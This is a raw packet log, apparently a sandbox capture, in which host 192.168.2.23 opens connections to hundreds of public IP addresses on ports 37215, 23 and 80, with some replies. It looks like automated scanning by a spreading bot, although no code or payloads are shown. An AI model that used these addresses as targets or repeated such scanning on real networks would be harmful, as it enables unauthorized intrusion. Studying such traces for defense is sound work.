                                                          Jan 2, 2024 06:23:48.216510057 CET2452937215192.168.2.2341.122.48.156
                                                          Jan 2, 2024 06:23:48.216510057 CET2452937215192.168.2.2341.227.164.223
                                                          Jan 2, 2024 06:23:48.216516972 CET2452937215192.168.2.23197.214.196.93
                                                          Jan 2, 2024 06:23:48.216526985 CET2452937215192.168.2.23197.207.129.187
                                                          Jan 2, 2024 06:23:48.216528893 CET2452937215192.168.2.23156.172.53.61
                                                          Jan 2, 2024 06:23:48.216536999 CET2452937215192.168.2.2341.56.111.134
                                                          Jan 2, 2024 06:23:48.216545105 CET2452937215192.168.2.2341.184.59.124
                                                          Jan 2, 2024 06:23:48.216550112 CET2452937215192.168.2.23197.27.67.129
                                                          Jan 2, 2024 06:23:48.216551065 CET2452937215192.168.2.23197.118.213.40
                                                          Jan 2, 2024 06:23:48.216552019 CET2452937215192.168.2.23197.167.38.225
                                                          Jan 2, 2024 06:23:48.216552973 CET2452937215192.168.2.23197.225.185.38
                                                          Jan 2, 2024 06:23:48.216557026 CET2452937215192.168.2.23197.107.91.148
                                                          Jan 2, 2024 06:23:48.216557026 CET2452937215192.168.2.23156.28.241.125
                                                          Jan 2, 2024 06:23:48.216563940 CET2452937215192.168.2.2341.21.103.45
                                                          Jan 2, 2024 06:23:48.216569901 CET2452937215192.168.2.23197.76.36.75
                                                          Jan 2, 2024 06:23:48.216578007 CET2452937215192.168.2.23156.96.4.154
                                                          Jan 2, 2024 06:23:48.216578007 CET2452937215192.168.2.23197.103.99.87
                                                          Jan 2, 2024 06:23:48.216589928 CET2452937215192.168.2.2341.48.245.140
                                                          Jan 2, 2024 06:23:48.216590881 CET2452937215192.168.2.2341.76.165.142
                                                          Jan 2, 2024 06:23:48.216603994 CET2452937215192.168.2.23156.232.142.203
                                                          Jan 2, 2024 06:23:48.216604948 CET2452937215192.168.2.2341.14.79.10
                                                          Jan 2, 2024 06:23:48.216615915 CET2452937215192.168.2.23156.209.210.4
                                                          Jan 2, 2024 06:23:48.216618061 CET2452937215192.168.2.2341.72.99.174
                                                          Jan 2, 2024 06:23:48.216625929 CET2452937215192.168.2.23156.211.104.27
                                                          Jan 2, 2024 06:23:48.216631889 CET2452937215192.168.2.23197.132.192.34
                                                          Jan 2, 2024 06:23:48.216638088 CET2452937215192.168.2.2341.63.173.56
                                                          Jan 2, 2024 06:23:48.216638088 CET2452937215192.168.2.2341.13.62.176
                                                          Jan 2, 2024 06:23:48.216640949 CET2452937215192.168.2.23156.131.181.226
                                                          Jan 2, 2024 06:23:48.216660976 CET2452937215192.168.2.2341.205.112.153
                                                          Jan 2, 2024 06:23:48.216662884 CET2452937215192.168.2.23156.4.202.40
                                                          Jan 2, 2024 06:23:48.216671944 CET2452937215192.168.2.2341.30.224.26
                                                          Jan 2, 2024 06:23:48.216675043 CET2452937215192.168.2.23156.16.237.12
                                                          Jan 2, 2024 06:23:48.216680050 CET2452937215192.168.2.2341.229.123.37
                                                          Jan 2, 2024 06:23:48.216696024 CET2452937215192.168.2.23197.106.175.192
                                                          Jan 2, 2024 06:23:48.216696978 CET2452937215192.168.2.23156.203.158.40
                                                          Jan 2, 2024 06:23:48.216698885 CET2452937215192.168.2.2341.221.20.222
                                                          Jan 2, 2024 06:23:48.216703892 CET2452937215192.168.2.2341.108.229.146
                                                          Jan 2, 2024 06:23:48.216705084 CET2452937215192.168.2.23156.103.179.7
                                                          Jan 2, 2024 06:23:48.216715097 CET2452937215192.168.2.23156.33.12.9
                                                          Jan 2, 2024 06:23:48.216725111 CET2452937215192.168.2.23156.200.91.121
                                                          Jan 2, 2024 06:23:48.216732025 CET2452937215192.168.2.23197.55.219.57
                                                          Jan 2, 2024 06:23:48.216747046 CET2452937215192.168.2.2341.98.49.216
                                                          Jan 2, 2024 06:23:48.216747046 CET2452937215192.168.2.2341.52.38.33
                                                          Jan 2, 2024 06:23:48.216768980 CET2452937215192.168.2.23156.218.110.53
                                                          Jan 2, 2024 06:23:48.216770887 CET2452937215192.168.2.2341.52.244.8
                                                          Jan 2, 2024 06:23:48.216770887 CET2452937215192.168.2.23197.151.156.207
                                                          Jan 2, 2024 06:23:48.216772079 CET2452937215192.168.2.2341.171.101.181
                                                          Jan 2, 2024 06:23:48.216770887 CET2452937215192.168.2.23197.197.20.237
                                                          Jan 2, 2024 06:23:48.216770887 CET2452937215192.168.2.23156.143.146.151
                                                          Jan 2, 2024 06:23:48.216783047 CET2452937215192.168.2.23197.177.97.74
                                                          Jan 2, 2024 06:23:48.216789961 CET2452937215192.168.2.23156.93.10.228
                                                          Jan 2, 2024 06:23:48.216804981 CET2452937215192.168.2.23197.138.186.200
                                                          Jan 2, 2024 06:23:48.216805935 CET2452937215192.168.2.23156.138.200.130
                                                          Jan 2, 2024 06:23:48.216816902 CET2452937215192.168.2.23197.255.79.255
                                                          Jan 2, 2024 06:23:48.216825962 CET2452937215192.168.2.23197.139.125.223
                                                          Jan 2, 2024 06:23:48.216834068 CET2452937215192.168.2.2341.194.154.191
                                                          Jan 2, 2024 06:23:48.216842890 CET2452937215192.168.2.23197.164.191.174
                                                          Jan 2, 2024 06:23:48.216842890 CET2452937215192.168.2.23156.231.78.198
                                                          Jan 2, 2024 06:23:48.216845036 CET2452937215192.168.2.23197.73.4.25
                                                          Jan 2, 2024 06:23:48.216852903 CET2452937215192.168.2.23197.130.133.101
                                                          Jan 2, 2024 06:23:48.216867924 CET2452937215192.168.2.2341.118.139.208
                                                          Jan 2, 2024 06:23:48.216867924 CET2452937215192.168.2.23197.127.136.231
                                                          Jan 2, 2024 06:23:48.216880083 CET2452937215192.168.2.23197.100.100.200
                                                          Jan 2, 2024 06:23:48.216881037 CET2452937215192.168.2.23197.51.215.58
                                                          Jan 2, 2024 06:23:48.216881990 CET2452937215192.168.2.23197.85.159.107
                                                          Jan 2, 2024 06:23:48.216902018 CET2452937215192.168.2.23156.21.115.151
                                                          Jan 2, 2024 06:23:48.216902971 CET2452937215192.168.2.2341.213.115.12
                                                          Jan 2, 2024 06:23:48.216902971 CET2452937215192.168.2.23156.185.181.164
                                                          Jan 2, 2024 06:23:48.216903925 CET2452937215192.168.2.2341.202.156.156
                                                          Jan 2, 2024 06:23:48.216908932 CET2452937215192.168.2.23156.115.74.59
                                                          Jan 2, 2024 06:23:48.216917038 CET2452937215192.168.2.23197.95.112.245
                                                          Jan 2, 2024 06:23:48.216922045 CET2452937215192.168.2.2341.49.201.66
                                                          Jan 2, 2024 06:23:48.216931105 CET2452937215192.168.2.2341.178.139.203
                                                          Jan 2, 2024 06:23:48.216933012 CET2452937215192.168.2.23197.88.45.93
                                                          Jan 2, 2024 06:23:48.216943026 CET2452937215192.168.2.23197.44.132.150
                                                          Jan 2, 2024 06:23:48.216947079 CET2452937215192.168.2.23197.55.208.118
                                                          Jan 2, 2024 06:23:48.216949940 CET2452937215192.168.2.23156.234.240.250
                                                          Jan 2, 2024 06:23:48.216952085 CET2452937215192.168.2.2341.254.212.40
                                                          Jan 2, 2024 06:23:48.216959000 CET2452937215192.168.2.2341.214.13.230
                                                          Jan 2, 2024 06:23:48.216963053 CET2452937215192.168.2.23197.116.76.228
                                                          Jan 2, 2024 06:23:48.216963053 CET2452937215192.168.2.23156.60.39.229
                                                          Jan 2, 2024 06:23:48.216972113 CET2452937215192.168.2.23156.30.99.112
                                                          Jan 2, 2024 06:23:48.216974020 CET2452937215192.168.2.23156.190.114.186
                                                          Jan 2, 2024 06:23:48.216983080 CET2452937215192.168.2.2341.223.184.149
                                                          Jan 2, 2024 06:23:48.216983080 CET2452937215192.168.2.2341.203.230.203
                                                          Jan 2, 2024 06:23:48.216984987 CET2452937215192.168.2.23156.129.95.147
                                                          Jan 2, 2024 06:23:48.216986895 CET2452937215192.168.2.23197.97.5.24
                                                          Jan 2, 2024 06:23:48.216990948 CET2452937215192.168.2.23197.7.188.48
                                                          Jan 2, 2024 06:23:48.216999054 CET2452937215192.168.2.23156.219.198.212
                                                          Jan 2, 2024 06:23:48.217001915 CET2452937215192.168.2.23156.115.88.4
                                                          Jan 2, 2024 06:23:48.217006922 CET2452937215192.168.2.23156.247.18.93
                                                          Jan 2, 2024 06:23:48.217017889 CET2452937215192.168.2.2341.192.246.189
                                                          Jan 2, 2024 06:23:48.217021942 CET2452937215192.168.2.2341.93.91.79
                                                          Jan 2, 2024 06:23:48.217022896 CET2452937215192.168.2.23197.25.105.57
                                                          Jan 2, 2024 06:23:48.217021942 CET2452937215192.168.2.2341.4.198.239
                                                          Jan 2, 2024 06:23:48.217030048 CET2452937215192.168.2.23197.148.19.166
                                                          Jan 2, 2024 06:23:48.217030048 CET2452937215192.168.2.2341.28.201.53
                                                          Jan 2, 2024 06:23:48.217034101 CET2452937215192.168.2.23197.131.201.10
                                                          Jan 2, 2024 06:23:48.217041016 CET2452937215192.168.2.23197.184.233.224
                                                          Jan 2, 2024 06:23:48.217046022 CET2452937215192.168.2.23156.225.31.136
                                                          Jan 2, 2024 06:23:48.217060089 CET2452937215192.168.2.23197.238.211.177
                                                          Jan 2, 2024 06:23:48.217060089 CET2452937215192.168.2.23156.255.30.26
                                                          Jan 2, 2024 06:23:48.217062950 CET2452937215192.168.2.23197.196.34.96
                                                          Jan 2, 2024 06:23:48.217062950 CET2452937215192.168.2.2341.48.1.147
                                                          Jan 2, 2024 06:23:48.217067957 CET2452937215192.168.2.2341.182.127.111
                                                          Jan 2, 2024 06:23:48.217072010 CET2452937215192.168.2.2341.150.180.251
                                                          Jan 2, 2024 06:23:48.217082977 CET2452937215192.168.2.23156.207.189.199
                                                          Jan 2, 2024 06:23:48.217083931 CET2452937215192.168.2.23197.55.97.212
                                                          Jan 2, 2024 06:23:48.217083931 CET2452937215192.168.2.23156.139.227.79
                                                          Jan 2, 2024 06:23:48.217083931 CET2452937215192.168.2.23197.213.190.116
                                                          Jan 2, 2024 06:23:48.217092991 CET2452937215192.168.2.23197.154.100.229
                                                          Jan 2, 2024 06:23:48.217107058 CET2452937215192.168.2.2341.133.248.133
                                                          Jan 2, 2024 06:23:48.217107058 CET2452937215192.168.2.23156.201.113.139
                                                          Jan 2, 2024 06:23:48.217116117 CET2452937215192.168.2.2341.87.51.175
                                                          Jan 2, 2024 06:23:48.217117071 CET2452937215192.168.2.23197.3.80.120
                                                          Jan 2, 2024 06:23:48.217127085 CET2452937215192.168.2.23156.208.248.87
                                                          Jan 2, 2024 06:23:48.217128038 CET2452937215192.168.2.2341.101.86.237
                                                          Jan 2, 2024 06:23:48.217128038 CET2452937215192.168.2.23197.98.120.228
                                                          Jan 2, 2024 06:23:48.217128038 CET2452937215192.168.2.23156.113.61.126
                                                          Jan 2, 2024 06:23:48.217128992 CET2452937215192.168.2.23197.210.66.222
                                                          Jan 2, 2024 06:23:48.217133999 CET2452937215192.168.2.2341.94.93.149
                                                          Jan 2, 2024 06:23:48.217143059 CET2452937215192.168.2.23197.195.245.52
                                                          Jan 2, 2024 06:23:48.217148066 CET2452937215192.168.2.2341.176.69.125
                                                          Jan 2, 2024 06:23:48.217149019 CET2452937215192.168.2.2341.129.174.131
                                                          Jan 2, 2024 06:23:48.217158079 CET2452937215192.168.2.23197.231.202.81
                                                          Jan 2, 2024 06:23:48.217170000 CET2452937215192.168.2.23156.103.58.25
                                                          Jan 2, 2024 06:23:48.217170000 CET2452937215192.168.2.23156.25.2.232
                                                          Jan 2, 2024 06:23:48.217174053 CET2452937215192.168.2.23156.12.15.107
                                                          Jan 2, 2024 06:23:48.217180967 CET2452937215192.168.2.23156.162.224.90
                                                          Jan 2, 2024 06:23:48.217181921 CET2452937215192.168.2.2341.64.15.178
                                                          Jan 2, 2024 06:23:48.217192888 CET2452937215192.168.2.23197.132.187.65
                                                          Jan 2, 2024 06:23:48.217200041 CET2452937215192.168.2.23197.68.245.49
                                                          Jan 2, 2024 06:23:48.217200041 CET2452937215192.168.2.23197.197.202.113
                                                          Jan 2, 2024 06:23:48.217204094 CET2452937215192.168.2.2341.124.141.114
                                                          Jan 2, 2024 06:23:48.217204094 CET2452937215192.168.2.23156.130.139.36
                                                          Jan 2, 2024 06:23:48.217211008 CET2452937215192.168.2.23156.243.216.247
                                                          Jan 2, 2024 06:23:48.217211962 CET2452937215192.168.2.2341.20.136.181
                                                          Jan 2, 2024 06:23:48.217219114 CET2452937215192.168.2.23197.101.32.57
                                                          Jan 2, 2024 06:23:48.217226982 CET2452937215192.168.2.23156.64.241.204
                                                          Jan 2, 2024 06:23:48.217231035 CET2452937215192.168.2.2341.7.15.206
                                                          Jan 2, 2024 06:23:48.217233896 CET2452937215192.168.2.23197.222.162.106
                                                          Jan 2, 2024 06:23:48.217233896 CET2452937215192.168.2.23156.49.73.120
                                                          Jan 2, 2024 06:23:48.217238903 CET2452937215192.168.2.23156.132.123.98
                                                          Jan 2, 2024 06:23:48.217247963 CET2452937215192.168.2.23156.56.16.44
                                                          Jan 2, 2024 06:23:48.217251062 CET2452937215192.168.2.23156.194.3.139
                                                          Jan 2, 2024 06:23:48.217255116 CET2452937215192.168.2.23197.224.76.44
                                                          Jan 2, 2024 06:23:48.217264891 CET2452937215192.168.2.2341.20.11.156
                                                          Jan 2, 2024 06:23:48.217272043 CET2452937215192.168.2.23197.204.232.13
                                                          Jan 2, 2024 06:23:48.217278957 CET2452937215192.168.2.23197.250.148.231
                                                          Jan 2, 2024 06:23:48.217284918 CET2452937215192.168.2.23156.141.132.139
                                                          Jan 2, 2024 06:23:48.217298985 CET2452937215192.168.2.23197.236.73.27
                                                          Jan 2, 2024 06:23:48.217298985 CET2452937215192.168.2.23156.95.201.96
                                                          Jan 2, 2024 06:23:48.217315912 CET2452937215192.168.2.2341.40.210.7
                                                          Jan 2, 2024 06:23:48.217315912 CET2452937215192.168.2.23156.6.71.189
                                                          Jan 2, 2024 06:23:48.217322111 CET2452937215192.168.2.2341.51.213.158
                                                          Jan 2, 2024 06:23:48.217335939 CET2452937215192.168.2.23156.60.154.76
                                                          Jan 2, 2024 06:23:48.217338085 CET2452937215192.168.2.23197.213.180.240
                                                          Jan 2, 2024 06:23:48.217344999 CET2452937215192.168.2.23156.86.81.247
                                                          Jan 2, 2024 06:23:48.217363119 CET2452937215192.168.2.23197.63.249.22
                                                          Jan 2, 2024 06:23:48.217363119 CET2452937215192.168.2.23197.137.98.187
                                                          Jan 2, 2024 06:23:48.217370987 CET2452937215192.168.2.23156.158.223.145
                                                          Jan 2, 2024 06:23:48.217382908 CET2452937215192.168.2.23197.142.112.170
                                                          Jan 2, 2024 06:23:48.217382908 CET2452937215192.168.2.23197.145.14.126
                                                          Jan 2, 2024 06:23:48.217387915 CET2452937215192.168.2.23197.55.200.199
                                                          Jan 2, 2024 06:23:48.217387915 CET2452937215192.168.2.23197.206.45.158
                                                          Jan 2, 2024 06:23:48.217396021 CET2452937215192.168.2.2341.42.184.151
                                                          Jan 2, 2024 06:23:48.217405081 CET2452937215192.168.2.2341.63.175.206
                                                          Jan 2, 2024 06:23:48.217408895 CET2452937215192.168.2.2341.170.212.120
                                                          Jan 2, 2024 06:23:48.217410088 CET2452937215192.168.2.23156.135.39.88
                                                          Jan 2, 2024 06:23:48.217410088 CET2452937215192.168.2.23197.63.85.255
                                                          Jan 2, 2024 06:23:48.217422962 CET2452937215192.168.2.23197.204.207.98
                                                          Jan 2, 2024 06:23:48.217432976 CET2452937215192.168.2.23197.122.83.206
                                                          Jan 2, 2024 06:23:48.217434883 CET2452937215192.168.2.23197.63.20.244
                                                          Jan 2, 2024 06:23:48.217446089 CET2452937215192.168.2.2341.48.108.73
                                                          Jan 2, 2024 06:23:48.217447042 CET2452937215192.168.2.2341.202.174.213
                                                          Jan 2, 2024 06:23:48.217670918 CET3406437215192.168.2.23156.235.102.230
                                                          Jan 2, 2024 06:23:48.348642111 CET231426538.152.88.83192.168.2.23
                                                          Jan 2, 2024 06:23:48.363950968 CET8018377167.172.137.111192.168.2.23
                                                          Jan 2, 2024 06:23:48.364007950 CET1837780192.168.2.23167.172.137.111
                                                          Jan 2, 2024 06:23:48.382560968 CET3721534064156.235.102.230192.168.2.23
                                                          Jan 2, 2024 06:23:48.382637978 CET3406437215192.168.2.23156.235.102.230
                                                          Jan 2, 2024 06:23:48.382924080 CET3406437215192.168.2.23156.235.102.230
                                                          Jan 2, 2024 06:23:48.382956982 CET3406437215192.168.2.23156.235.102.230
                                                          Jan 2, 2024 06:23:48.383016109 CET3406637215192.168.2.23156.235.102.230
                                                          Jan 2, 2024 06:23:48.421772957 CET2314265190.73.189.149192.168.2.23
                                                          Jan 2, 2024 06:23:48.453665972 CET2314265131.114.170.228192.168.2.23
                                                          Jan 2, 2024 06:23:48.459810019 CET2314265151.95.192.136192.168.2.23
                                                          Jan 2, 2024 06:23:48.462671995 CET801837791.215.216.43192.168.2.23
                                                          Jan 2, 2024 06:23:48.462728977 CET1837780192.168.2.2391.215.216.43
                                                          Jan 2, 2024 06:23:48.465833902 CET231426583.6.89.221192.168.2.23
                                                          Jan 2, 2024 06:23:48.470666885 CET8018377189.76.61.91192.168.2.23
                                                          Jan 2, 2024 06:23:48.475505114 CET2314265125.142.194.94192.168.2.23
                                                          Jan 2, 2024 06:23:48.487370968 CET231426549.88.209.56192.168.2.23
                                                          Jan 2, 2024 06:23:48.489643097 CET372152452941.224.44.225192.168.2.23
                                                          Jan 2, 2024 06:23:48.490354061 CET8018377105.152.22.74192.168.2.23
                                                          Jan 2, 2024 06:23:48.497539043 CET2314265221.156.113.101192.168.2.23
                                                          Jan 2, 2024 06:23:48.501491070 CET801837749.246.45.1192.168.2.23
                                                          Jan 2, 2024 06:23:48.502413034 CET8018377118.63.55.155192.168.2.23
                                                          Jan 2, 2024 06:23:48.503889084 CET231426593.66.24.152192.168.2.23
                                                          Jan 2, 2024 06:23:48.503984928 CET8018377115.40.72.2192.168.2.23
                                                          Jan 2, 2024 06:23:48.504308939 CET8018377118.219.140.16192.168.2.23
                                                          Jan 2, 2024 06:23:48.507766962 CET3721524529156.225.31.136192.168.2.23
                                                          Jan 2, 2024 06:23:48.516546965 CET3721524529156.241.14.153192.168.2.23
                                                          Jan 2, 2024 06:23:48.516590118 CET2452937215192.168.2.23156.241.14.153
                                                          Jan 2, 2024 06:23:48.520373106 CET3721524529197.131.201.10192.168.2.23
                                                          Jan 2, 2024 06:23:48.520910025 CET3721524529156.247.18.93192.168.2.23
                                                          Jan 2, 2024 06:23:48.520951033 CET2452937215192.168.2.23156.247.18.93
                                                          Jan 2, 2024 06:23:48.546251059 CET3721524529197.6.57.2192.168.2.23
                                                          Jan 2, 2024 06:23:48.564317942 CET3721524529197.130.133.101192.168.2.23
                                                          Jan 2, 2024 06:23:48.574979067 CET8018377114.150.20.92192.168.2.23
                                                          Jan 2, 2024 06:23:48.607650995 CET2314265119.112.131.49192.168.2.23
                                                          Jan 2, 2024 06:23:48.625004053 CET3721524529197.100.243.89192.168.2.23
                                                          Jan 2, 2024 06:23:48.754322052 CET3406437215192.168.2.23156.235.102.230
                                                          Jan 2, 2024 06:23:49.138283014 CET42836443192.168.2.2391.189.91.43
                                                          Jan 2, 2024 06:23:49.195907116 CET1426523192.168.2.23131.202.130.189
                                                          Jan 2, 2024 06:23:49.195911884 CET1426523192.168.2.2364.140.64.105
                                                          Jan 2, 2024 06:23:49.195911884 CET1426523192.168.2.2360.216.100.42
                                                          Jan 2, 2024 06:23:49.195916891 CET1426523192.168.2.23162.146.139.33
                                                          Jan 2, 2024 06:23:49.195926905 CET1426523192.168.2.2368.61.188.43
                                                          Jan 2, 2024 06:23:49.195939064 CET1426523192.168.2.23131.35.16.15
                                                          Jan 2, 2024 06:23:49.195939064 CET1426523192.168.2.23184.42.163.83
                                                          Jan 2, 2024 06:23:49.195945024 CET1426523192.168.2.23150.237.226.210
                                                          Jan 2, 2024 06:23:49.195950985 CET1426523192.168.2.2381.196.169.65
                                                          Jan 2, 2024 06:23:49.195955038 CET1426523192.168.2.23126.27.9.12
                                                          Jan 2, 2024 06:23:49.195959091 CET1426523192.168.2.23114.180.201.218
                                                          Jan 2, 2024 06:23:49.195971966 CET1426523192.168.2.2394.199.159.6
                                                          Jan 2, 2024 06:23:49.195972919 CET1426523192.168.2.2353.210.9.47
                                                          Jan 2, 2024 06:23:49.195972919 CET1426523192.168.2.23153.234.213.123
                                                          Jan 2, 2024 06:23:49.195991993 CET1426523192.168.2.23144.45.103.32
                                                          Jan 2, 2024 06:23:49.195995092 CET1426523192.168.2.23184.42.203.52
                                                          Jan 2, 2024 06:23:49.195996046 CET1426523192.168.2.23210.102.166.48
                                                          Jan 2, 2024 06:23:49.195996046 CET1426523192.168.2.23106.98.56.142
                                                          Jan 2, 2024 06:23:49.195996046 CET1426523192.168.2.23198.91.93.188
                                                          Jan 2, 2024 06:23:49.195997953 CET1426523192.168.2.23202.207.14.77
                                                          Jan 2, 2024 06:23:49.196010113 CET1426523192.168.2.2344.246.167.74
                                                          Jan 2, 2024 06:23:49.196016073 CET1426523192.168.2.23156.1.117.46
                                                          Jan 2, 2024 06:23:49.196016073 CET1426523192.168.2.2367.136.6.182
                                                          Jan 2, 2024 06:23:49.196029902 CET1426523192.168.2.23155.181.84.92
                                                          Jan 2, 2024 06:23:49.196031094 CET1426523192.168.2.2340.64.23.79
                                                          Jan 2, 2024 06:23:49.196033001 CET1426523192.168.2.23183.208.219.38
                                                          Jan 2, 2024 06:23:49.196042061 CET1426523192.168.2.2317.56.36.232
                                                          Jan 2, 2024 06:23:49.196048021 CET1426523192.168.2.23126.50.50.5
                                                          Jan 2, 2024 06:23:49.196048021 CET1426523192.168.2.23184.92.105.173
                                                          Jan 2, 2024 06:23:49.196058989 CET1426523192.168.2.23130.86.105.141
                                                          Jan 2, 2024 06:23:49.196063995 CET1426523192.168.2.23210.62.25.125
                                                          Jan 2, 2024 06:23:49.196079969 CET1426523192.168.2.23105.237.111.206
                                                          Jan 2, 2024 06:23:49.196079969 CET1426523192.168.2.23199.213.210.98
                                                          Jan 2, 2024 06:23:49.196079969 CET1426523192.168.2.23140.247.29.221
                                                          Jan 2, 2024 06:23:49.196080923 CET1426523192.168.2.2373.51.56.160
                                                          Jan 2, 2024 06:23:49.196094990 CET1426523192.168.2.2362.46.179.16
                                                          Jan 2, 2024 06:23:49.196099043 CET1426523192.168.2.23211.22.228.46
                                                          Jan 2, 2024 06:23:49.196103096 CET1426523192.168.2.23187.51.92.214
                                                          Jan 2, 2024 06:23:49.196114063 CET1426523192.168.2.23121.249.198.91
                                                          Jan 2, 2024 06:23:49.196118116 CET1426523192.168.2.23171.87.249.38
                                                          Jan 2, 2024 06:23:49.196118116 CET1426523192.168.2.23197.216.223.58
                                                          Jan 2, 2024 06:23:49.196124077 CET1426523192.168.2.23210.17.150.32
                                                          Jan 2, 2024 06:23:49.196130037 CET1426523192.168.2.23121.135.35.109
                                                          Jan 2, 2024 06:23:49.196142912 CET1426523192.168.2.23211.243.180.195
                                                          Jan 2, 2024 06:23:49.196144104 CET1426523192.168.2.2358.105.162.232
                                                          Jan 2, 2024 06:23:49.196150064 CET1426523192.168.2.2344.93.103.60
                                                          Jan 2, 2024 06:23:49.196156979 CET1426523192.168.2.2319.48.21.7
                                                          Jan 2, 2024 06:23:49.196156979 CET1426523192.168.2.23210.153.34.198
                                                          Jan 2, 2024 06:23:49.196176052 CET1426523192.168.2.23147.52.200.254
                                                          Jan 2, 2024 06:23:49.196176052 CET1426523192.168.2.23195.95.247.198
                                                          Jan 2, 2024 06:23:49.196176052 CET1426523192.168.2.2396.28.233.227
                                                          Jan 2, 2024 06:23:49.196177959 CET1426523192.168.2.23141.224.99.249
                                                          Jan 2, 2024 06:23:49.196183920 CET1426523192.168.2.2349.203.88.231
                                                          Jan 2, 2024 06:23:49.196187019 CET1426523192.168.2.23122.169.181.140
                                                          Jan 2, 2024 06:23:49.196192026 CET1426523192.168.2.239.174.138.48
                                                          Jan 2, 2024 06:23:49.196206093 CET1426523192.168.2.232.236.235.193
                                                          Jan 2, 2024 06:23:49.196207047 CET1426523192.168.2.2346.42.172.88
                                                          Jan 2, 2024 06:23:49.196207047 CET1426523192.168.2.23143.254.207.125
                                                          Jan 2, 2024 06:23:49.196214914 CET1426523192.168.2.23119.82.44.147
                                                          Jan 2, 2024 06:23:49.196217060 CET1426523192.168.2.2393.39.117.59
                                                          Jan 2, 2024 06:23:49.196218014 CET1426523192.168.2.2353.94.224.253
                                                          Jan 2, 2024 06:23:49.196218014 CET1426523192.168.2.23156.61.148.244
                                                          Jan 2, 2024 06:23:49.196228981 CET1426523192.168.2.23120.125.65.170
                                                          Jan 2, 2024 06:23:49.196235895 CET1426523192.168.2.23129.73.197.10
                                                          Jan 2, 2024 06:23:49.196237087 CET1426523192.168.2.2354.139.213.104
                                                          Jan 2, 2024 06:23:49.196249962 CET1426523192.168.2.23193.227.17.3
                                                          Jan 2, 2024 06:23:49.196252108 CET1426523192.168.2.23198.59.175.202
                                                          Jan 2, 2024 06:23:49.196259975 CET1426523192.168.2.23181.117.84.233
                                                          Jan 2, 2024 06:23:49.196260929 CET1426523192.168.2.23122.154.173.105
                                                          Jan 2, 2024 06:23:49.196261883 CET1426523192.168.2.23148.49.240.201
                                                          Jan 2, 2024 06:23:49.196264029 CET1426523192.168.2.2387.47.43.141
                                                          Jan 2, 2024 06:23:49.196261883 CET1426523192.168.2.23181.150.19.231
                                                          Jan 2, 2024 06:23:49.196260929 CET1426523192.168.2.23125.215.50.34
                                                          Jan 2, 2024 06:23:49.196273088 CET1426523192.168.2.23134.230.76.244
                                                          Jan 2, 2024 06:23:49.196280956 CET1426523192.168.2.23154.126.37.2
                                                          Jan 2, 2024 06:23:49.196283102 CET1426523192.168.2.2363.169.36.149
                                                          Jan 2, 2024 06:23:49.196285009 CET1426523192.168.2.2359.170.187.111
                                                          Jan 2, 2024 06:23:49.196297884 CET1426523192.168.2.23223.165.200.229
                                                          Jan 2, 2024 06:23:49.196299076 CET1426523192.168.2.23133.220.234.161
                                                          Jan 2, 2024 06:23:49.196305037 CET1426523192.168.2.23155.10.47.23
                                                          Jan 2, 2024 06:23:49.196310997 CET1426523192.168.2.23114.13.24.112
                                                          Jan 2, 2024 06:23:49.196321011 CET1426523192.168.2.23111.138.211.92
                                                          Jan 2, 2024 06:23:49.196322918 CET1426523192.168.2.2314.63.236.102
                                                          Jan 2, 2024 06:23:49.196322918 CET1426523192.168.2.2390.252.97.176
                                                          Jan 2, 2024 06:23:49.196324110 CET1426523192.168.2.23196.154.167.220
                                                          Jan 2, 2024 06:23:49.196326971 CET1426523192.168.2.2362.214.22.31
                                                          Jan 2, 2024 06:23:49.196336985 CET1426523192.168.2.23195.123.45.45
                                                          Jan 2, 2024 06:23:49.196338892 CET1426523192.168.2.23203.218.134.158
                                                          Jan 2, 2024 06:23:49.196341991 CET1426523192.168.2.2391.58.217.67
                                                          Jan 2, 2024 06:23:49.196345091 CET1426523192.168.2.23205.155.103.196
                                                          Jan 2, 2024 06:23:49.196357012 CET1426523192.168.2.23222.118.224.197
                                                          Jan 2, 2024 06:23:49.196360111 CET1426523192.168.2.23138.133.98.171
                                                          Jan 2, 2024 06:23:49.196360111 CET1426523192.168.2.23188.172.81.55
                                                          Jan 2, 2024 06:23:49.196366072 CET1426523192.168.2.23143.192.101.46
                                                          Jan 2, 2024 06:23:49.196367979 CET1426523192.168.2.23220.33.50.57
                                                          Jan 2, 2024 06:23:49.196384907 CET1426523192.168.2.2398.30.15.74
                                                          Jan 2, 2024 06:23:49.196384907 CET1426523192.168.2.23102.65.162.10
                                                          Jan 2, 2024 06:23:49.196388006 CET1426523192.168.2.2379.228.76.96
                                                          Jan 2, 2024 06:23:49.196388960 CET1426523192.168.2.2397.59.63.131
                                                          Jan 2, 2024 06:23:49.196393967 CET1426523192.168.2.23133.151.191.162
                                                          Jan 2, 2024 06:23:49.196402073 CET1426523192.168.2.2397.215.29.88
                                                          Jan 2, 2024 06:23:49.196402073 CET1426523192.168.2.23164.207.225.141
                                                          Jan 2, 2024 06:23:49.196408987 CET1426523192.168.2.2387.97.9.197
                                                          Jan 2, 2024 06:23:49.196414948 CET1426523192.168.2.23204.198.213.118
                                                          Jan 2, 2024 06:23:49.196422100 CET1426523192.168.2.23164.80.79.239
                                                          Jan 2, 2024 06:23:49.196424007 CET1426523192.168.2.23135.197.66.209
                                                          Jan 2, 2024 06:23:49.196432114 CET1426523192.168.2.23201.48.192.3
                                                          Jan 2, 2024 06:23:49.196439028 CET1426523192.168.2.23130.159.83.5
                                                          Jan 2, 2024 06:23:49.196444988 CET1426523192.168.2.238.152.235.39
                                                          Jan 2, 2024 06:23:49.196444988 CET1426523192.168.2.23192.142.255.155
                                                          Jan 2, 2024 06:23:49.196463108 CET1426523192.168.2.23123.70.228.85
                                                          Jan 2, 2024 06:23:49.196464062 CET1426523192.168.2.23170.236.218.181
                                                          Jan 2, 2024 06:23:49.196466923 CET1426523192.168.2.23140.56.70.76
                                                          Jan 2, 2024 06:23:49.196466923 CET1426523192.168.2.23134.164.77.78
                                                          Jan 2, 2024 06:23:49.196472883 CET1426523192.168.2.23158.127.44.196
                                                          Jan 2, 2024 06:23:49.196472883 CET1426523192.168.2.23102.73.235.149
                                                          Jan 2, 2024 06:23:49.196485043 CET1426523192.168.2.23178.156.216.70
                                                          Jan 2, 2024 06:23:49.196485043 CET1426523192.168.2.23222.178.223.91
                                                          Jan 2, 2024 06:23:49.196490049 CET1426523192.168.2.23164.2.217.232
                                                          Jan 2, 2024 06:23:49.196508884 CET1426523192.168.2.23206.46.217.125
                                                          Jan 2, 2024 06:23:49.196508884 CET1426523192.168.2.23156.136.87.108
                                                          Jan 2, 2024 06:23:49.196522951 CET1426523192.168.2.23113.247.16.79
